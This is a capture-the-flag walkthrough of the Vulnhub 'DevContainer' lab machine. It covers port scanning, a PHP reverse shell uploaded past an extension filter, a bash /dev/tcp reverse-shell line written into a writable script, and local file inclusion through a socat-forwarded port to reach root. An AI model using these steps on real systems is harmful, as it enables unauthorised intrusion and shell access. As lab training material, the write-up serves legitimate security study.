**DevContainer**
*Vulnhub Walkthrough*
#alperenugurlu
First of all, we learn the ‘IP’ address of the machine. **
root@kali:~# netdiscover -r 10.0.2.0/24
Now we are scanning all ports with the ‘nmap’ tool. We determine the Service and Version. root@kali:~#nmap -sS -sV -A -p- 10.0.2.15
Investigation of hidden and existing files can be used in both local network penetration tests and web application.Security is very important in penetration tests.For this, we use my preferred ‘dirb’ tool.Here it is said that we have the right to access directories with the code ‘200’.
There is the “upload” directory that interests me. Can I inject the “reverse shell” here? If I can inject, we can access it via netcat.
We create a reverse-shell right now.
Next, we make edits to be able to listen in. Here we write our own ‘ip’ and the port we want to listen to. We save the file name as shell.php.jpeg. (To pass the security filter.)
When uploading the file, we intervene with the ‘burp suite’ tool and forward the php.jpeg extension as php.
We listen with the nc -lvnp 2345 command.
There was a folder that caught my attention while reviewing the files. We go to the / var / www / html folder. Here we see a file named Maintenance-Web-Docker. I found the bash file. I immediately thought if I could do a reverse-shell here for higher powers? Our command is: echo “bash -i>& /dev/tcp/ <local_ip>/<LPORT>0>&1”> list.sh
We are listening with netcat in a new terminal.
nc -lnvp 2222
and finally we got to ‘richard’. =)
We recovered our password from user.txt. We check the root rights with the sudo -l command. We came across information about another directory. Let’s go there and see what’s inside. Here ‘sudo -u root / home / richard / HackTools / socat TCP-LISTEN \: 8080 \, fork TCP \: 127.0.0.1 \: 90’ we are running.
Now we type the ip number of the machine we attacked our browser and enter port 8080. Another website appears. Here, about us, the communication buttons appear, it comes to my mind that it may be ‘LFI’ .. =) Let’s see …
Yes! There is an LFI deficit. We can exploit it now. We can reload the reverse-shell we made at the beginning and listen.
We set up another port by editing our reverse-shell code. Using Burp, we manipulate and install in the same way. We copy this shell code from the upload files folder onto ‘mv shell.php /tmp/shell.php’. We go to 10.0.2.15:8080/index.php?view=../../../../../../home/richard/web/upload/files/shell.php. And we listen, open proof.txt and grab our flag! =)
